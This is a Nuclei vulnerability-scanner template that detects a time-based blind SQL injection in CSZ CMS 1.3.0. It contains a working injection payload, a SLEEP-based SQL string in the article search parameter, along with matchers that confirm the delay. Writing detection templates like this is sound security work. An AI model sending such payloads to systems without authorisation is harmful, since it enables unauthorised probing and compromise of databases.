nuclei-templates/http/vulnerabilities/other/csz-cms-sqli.yaml

30 lines
966 B
YAML

id: csz-cms-sqli
info:
name: CSZ CMS 1.3.0 - SQL Injection
author: r3Y3r53
severity: high
description: |
CSZ CMS version 1.3.0 suffers from multiple remote blind SQL injection vulnerabilities.
reference:
- https://packetstormsecurity.com/files/167028/CSZ-CMS-1.3.0-SQL-Injection.html
metadata:
verified: true
max-request: 1
tags: time-based-sqli,packetstorm,sqli,csz,cms
http:
- raw:
- |
@timeout: 20s
GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(body, "CSZ CMS")'
condition: and
# digest: 490a0046304402201fbe8af15aad7333b04c2cac4df60cfcf69d58d210896555a52e37e7e4a5671e02206c869448369e7bda62d1c49c33eb3279c432af68916e7611a74275f3b4da8e78:922c64590222798bb761d5b6d8e72950